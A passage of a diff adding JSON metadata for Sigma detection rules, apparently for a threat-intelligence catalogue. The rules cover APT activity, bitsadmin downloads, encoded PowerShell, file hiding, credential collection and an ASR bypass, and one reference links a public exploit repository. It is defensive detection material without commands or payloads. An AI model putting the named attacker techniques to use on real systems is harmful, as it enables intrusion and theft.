"attack.defense_evasion", + "car.2013-10-002", + "attack.t1218.011" + ], + "creation_date": "2018/03/01", + "filename": "proc_creation_win_apt_sofacy.yml", + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", + "uuid": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", + "value": "SOURGUM Actor Behaviours", + "meta": { + "refs": [ + "https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection", + "https://github.com/Azure/Azure-Sentinel/blob/43e9be273dca321295190bfc4902858e009d4a35/Detections/MultipleDataSources/SOURGUM_IOC.yaml", + "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_sourgrum.yml" + ], + "tags": [ + "attack.t1546", + "attack.t1546.015", + "attack.persistence", + "attack.privilege_escalation" + ], + "creation_date": "2021/06/15", + "filename": "proc_creation_win_apt_sourgrum.yml", + "author": "MSTIC, FPT.EagleEye", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", + "uuid": "18da1007-3f26-470f-875d-f77faf1cab31", + "value": "Ps.exe Renamed SysInternals Tool", + "meta": { + "refs": [ + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ta17_293a_ps.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.g0035", + "attack.t1036.003", + "car.2013-05-009" + ], + "creation_date": "2017/10/22", + "filename": "proc_creation_win_apt_ta17_293a_ps.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Renamed SysInternals tool" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents", + "uuid": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4", + "value": "TA505 Dropper Load Pattern", + "meta": { + "refs": [ + "https://twitter.com/ForensicITGuy/status/1334734244120309760", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ta505_dropper.yml" + ], + "tags": [ + "attack.execution", + "attack.g0092", + "attack.t1106" + ], + "creation_date": "2020/12/08", + "filename": "proc_creation_win_apt_ta505_dropper.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", + "uuid": "d1aa3382-abab-446f-96ea-4de52908210b", + "value": "TAIDOOR RAT DLL Load", + "meta": { + "refs": [ + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_taidoor.yml" + ], + "tags": [ + "attack.execution", + "attack.t1055.001" + ], + "creation_date": "2020/07/30", + "filename": "proc_creation_win_apt_taidoor.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", + "uuid": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", + "value": "TropicTrooper Campaign November 2018", + "meta": { + "refs": [ + "https://cloudblogs.microsoft.com/microsoftsecure/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_tropictrooper.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/11/12", + "filename": "proc_creation_win_apt_tropictrooper.yml", + "author": "@41thexplorer, Microsoft Defender ATP", + "level": "high", + "falsepositive": "No established falsepositives", + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects automated lateral movement by Turla group", + "uuid": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", + "value": "Turla Group Lateral Movement", + "meta": { + "refs": [ + "https://securelist.com/the-epic-turla-operation/65545/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_commands_critical.yml" + ], + "tags": [ + "attack.g0010", + "attack.execution", + "attack.t1059", + "attack.lateral_movement", + "attack.t1021.002", + "attack.discovery", + "attack.t1083", + "attack.t1135" + ], + "creation_date": "2017/11/07", + "filename": "proc_creation_win_apt_turla_commands_critical.yml", + "author": "Markus Neis", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects automated lateral movement by Turla group", + "uuid": "75925535-ca97-4e0a-a850-00b5c00779dc", + "value": "Automated Turla Group Lateral Movement", + "meta": { + "refs": [ + "https://securelist.com/the-epic-turla-operation/65545/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_commands_medium.yml" + ], + "tags": [ + "attack.g0010", + "attack.execution", + "attack.t1059", + "attack.lateral_movement", + "attack.t1021.002", + "attack.discovery", + "attack.t1083", + "attack.t1135" + ], + "creation_date": "2017/11/07", + "filename": "proc_creation_win_apt_turla_commands_medium.yml", + "author": "Markus Neis", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects commands used by Turla group as reported by ESET in May 2020", + "uuid": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", + "value": "Turla Group Commands May 2020", + "meta": { + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_comrat_may20.yml" + ], + "tags": [ + "attack.g0010", + "attack.execution", + "attack.t1059.001", + "attack.t1053.005", + "attack.t1027" + ], + "creation_date": "2020/05/26", + "filename": "proc_creation_win_apt_turla_comrat_may20.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries", + "uuid": "9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f", + "value": "UNC2452 Process Creation Patterns", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_cmds.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2021/01/22", + "filename": "proc_creation_win_apt_unc2452_cmds.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports", + "uuid": "b7155193-8a81-4d8f-805d-88de864ca50c", + "value": "UNC2452 PowerShell Pattern", + "meta": { + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", + "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_ps.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.t1047" + ], + "creation_date": "2021/01/20", + "filename": "proc_creation_win_apt_unc2452_ps.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. The Actor shares some TTPs with YYTRIUM/APT29 campaign in 2016.", + "uuid": "7453575c-a747-40b9-839b-125a0aae324b", + "value": "Unidentified Attacker November 2018", + "meta": { + "refs": [ + "https://twitter.com/DrunkBinary/status/1063075530180886529", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unidentified_nov_18.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218.011" + ], + "creation_date": "2018/11/20", + "filename": "proc_creation_win_apt_unidentified_nov_18.yml", + "author": "@41thexplorer, Microsoft Defender ATP", + "level": "high", + "falsepositive": "No established falsepositives", + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", + "uuid": "3121461b-5aa0-4a41-b910-66d25524edbb", + "value": "Winnti Malware HK University Campaign", + "meta": { + "refs": [ + "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_winnti_mal_hk_jan20.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002", + "attack.g0044" + ], + "creation_date": "2020/02/01", + "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml", + "author": "Florian Roth, Markus Neis", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", + "uuid": "73d70463-75c9-4258-92c6-17500fe972f2", + "value": "Winnti Pipemon Characteristics", + "meta": { + "refs": [ + "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_winnti_pipemon.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002", + "attack.g0044" + ], + "creation_date": "2020/07/30", + "filename": "proc_creation_win_apt_winnti_pipemon.yml", + "author": "Florian Roth, oscd.community", + "level": "critical", + "falsepositive": [ + "Legitimate setups that use similar flags" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects activity mentioned in Operation Wocao report", + "uuid": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", + "value": "Operation Wocao Activity", + "meta": { + "refs": [ + "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", + "https://twitter.com/SBousseaden/status/1207671369963646976", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_wocao.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1036.004", + "attack.t1027", + "attack.execution", + "attack.t1053.005", + "attack.t1059.001" + ], + "creation_date": "2019/12/20", + "filename": "proc_creation_win_apt_wocao.yml", + "author": "Florian Roth, frack113", + "level": "high", + "falsepositive": [ + "Administrators that use checkadmin.exe tool to enumerate local administrators" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a ZxShell start by the called and well-known function name", + "uuid": "f0b70adb-0075-43b0-9745-e82a1c608fcc", + "value": "ZxShell Malware", + "meta": { + "refs": [ + "https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_zxshell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003", + "attack.defense_evasion", + "attack.t1218.011", + "attack.s0412", + "attack.g0001" + ], + "creation_date": "2017/07/20", + "filename": "proc_creation_win_apt_zxshell.yml", + "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.", + "uuid": "24de4f3b-804c-4165-b442-5a06a2302c7e", + "value": "Arbitrary Shell Command Execution Via Settingcontent-Ms", + "meta": { + "refs": [ + "https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_arbitrary_shell_execution_via_settingcontent.yml" + ], + "tags": [ + "attack.t1204", + "attack.t1566.001", + "attack.execution", + "attack.initial_access" + ], + "creation_date": "2020/03/13", + "filename": "proc_creation_win_arbitrary_shell_execution_via_settingcontent.yml", + "author": "Sreeman", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", + "uuid": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "value": "Phishing Pattern ISO in Archive", + "meta": { + "refs": [ + "https://twitter.com/1ZRR4H/status/1534259727059787783", + "https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_archiver_iso_phishing.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566" + ], + "creation_date": "2022/06/07", + "filename": "proc_creation_win_archiver_iso_phishing.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Application Virtualization Utility is included with Microsoft Office. We are able to abuse \"AppVLP\" to execute shell commands.\nNormally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder\nor to mark a file as a system file.\n", + "uuid": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", + "value": "Using AppVLP To Circumvent ASR File Path Rule", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_asr_bypass_via_appvlp_re.yml" + ], + "tags": [ + "attack.t1218", + "attack.defense_evasion", + "attack.execution" + ], + "creation_date": "2020/03/13", + "filename": "proc_creation_win_asr_bypass_via_appvlp_re.yml", + "author": "Sreeman", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", + "uuid": "245f92e3-c4da-45f1-9070-bc552e06db11", + "value": "Atlassian Confluence CVE-2021-26084", + "meta": { + "refs": [ + "https://nvd.nist.gov/vuln/detail/CVE-2021-26084", + "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html", + "https://github.com/h3v0x/CVE-2021-26084_Confluence", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_atlassian_confluence_cve_2021_26084_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.execution", + "attack.t1190", + "attack.t1059" + ], + "creation_date": "2021/09/08", + "filename": "proc_creation_win_atlassian_confluence_cve_2021_26084_exploit.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of attrib.exe to hide files from users.", + "uuid": "4281cb20-2994-4580-aa63-c8b86d019934", + "value": "Hiding Files with Attrib.exe", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_hiding_files.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_attrib_hiding_files.yml", + "author": "Sami Ruohonen", + "level": "low", + "falsepositive": [ + "IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)", + "Msiexec.exe hiding desktop.ini" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Marks a file as a system file using the attrib.exe utility", + "uuid": "bb19e94c-59ae-4c15-8c12-c563d23fe52b", + "value": "Set Windows System File with Attrib", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ], + "creation_date": "2022/02/04", + "filename": "proc_creation_win_attrib_system.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of attrib with \"+s\" option to set suspicious script or executable as system files to hide them from users and make them unable to delete with simple rights. The rule limit the search to specific extensions and directories to avoid FP's", + "uuid": "efec536f-72e8-4656-8960-5e85d091345b", + "value": "Set Suspicious Files as System Files Using Attrib", + "meta": { + "refs": [ + "https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4", + "https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ], + "creation_date": "2022/06/28", + "filename": "proc_creation_win_attrib_system_susp_paths.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "uuid": "f576a613-2392-4067-9d1a-9345fb58d8d1", + "value": "Automated Collection Command Prompt", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_automated_collection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1119", + "attack.credential_access", + "attack.t1552.001" + ], + "creation_date": "2021/07/28", + "filename": "proc_creation_win_automated_collection.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects attackers using tooling with bad opsec defaults e.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run, one trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.", + "uuid": "a7c3d773-caef-227e-a7e7-c2f13c622329", + "value": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", + "meta": { + "refs": [ + "https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/", + "https://www.cobaltstrike.com/help-opsec", + "https://twitter.com/CyberRaiju/status/1251492025678983169", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32", + "https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool", + "https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ], + "creation_date": "2020/10/23", + "filename": "proc_creation_win_bad_opsec_sacrificial_processes.yml", + "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets", + "uuid": "fd6e2919-3936-40c9-99db-0aa922c356f7", + "value": "Malicious Base64 Encoded Powershell Invoke Cmdlets", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_invoke_susp_cmdlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ], + "creation_date": "2022/05/31", + "filename": "proc_creation_win_base64_invoke_susp_cmdlets.yml", + "author": "pH-T", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects base64 encoded listing Win32_Shadowcopy", + "uuid": "47688f1b-9f51-4656-b013-3cc49a166a36", + "value": "Base64 Encoded Listing of Shadowcopy", + "meta": { + "refs": [ + "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_listing_shadowcopy.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ], + "creation_date": "2022/03/01", + "filename": "proc_creation_win_base64_listing_shadowcopy.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects base64 encoded .NET reflective loading of Assembly", + "uuid": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", + "value": "Base64 Encoded Reflective Assembly Load", + "meta": { + "refs": [ + "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", + "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_reflective_assembly_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027", + "attack.t1620" + ], + "creation_date": "2022/03/01", + "filename": "proc_creation_win_base64_reflective_assembly_load.yml", + "author": "Christian Burkard, pH-T", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of bitsadmin downloading a file", + "uuid": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede", + "value": "Bitsadmin Download", + "meta": { + "refs": [ + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" + ], + "creation_date": "2017/03/09", + "filename": "proc_creation_win_bitsadmin_download.yml", + "author": "Michael Haag, FPT.EagleEye", + "level": "medium", + "falsepositive": [ + "Some legitimate apps use this, but limited." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", + "uuid": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", + "value": "Bitsadmin Download from Suspicious Domain", + "meta": { + "refs": [ + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_domain.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" + ], + "creation_date": "2022/06/28", + "filename": "proc_creation_win_bitsadmin_download_susp_domain.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Some legitimate apps use this, but limited." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", + "uuid": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "value": "Bitsadmin Download File with Suspicious Extension", + "meta": { + "refs": [ + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ext.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" + ], + "creation_date": "2022/06/28", + "filename": "proc_creation_win_bitsadmin_download_susp_ext.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", + "uuid": "99c840f2-2012-46fd-9141-c761987550ef", + "value": "Bitsadmin Download File from IP", + "meta": { + "refs": [ + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" + ], + "creation_date": "2022/06/28", + "filename": "proc_creation_win_bitsadmin_download_susp_ip.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", + "uuid": "2ddef153-167b-4e89-86b6-757a9e65dcac", + "value": "Bitsadmin Download to Suspicious Target Folder", + "meta": { + "refs": [ + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" + ], + "creation_date": "2022/06/28", + "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of bitsadmin downloading a file to uncommon target folder", + "uuid": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248", + "value": "Bitsadmin Download to Uncommon Target Folder", + "meta": { + "refs": [ + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" + ], + "creation_date": "2022/06/28", + "filename": "proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Identifies use of the bcdedit command to delete boot configuration data. This tactic is sometimes used as by malware or an attacker as a destructive technique.", + "uuid": "1444443e-6757-43e4-9ea4-c8fc705f79a2", + "value": "Modification of Boot Configuration", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", + "https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bootconf_mod.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ], + "creation_date": "2019/10/24", + "filename": "proc_creation_win_bootconf_mod.yml", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects browsers starting with 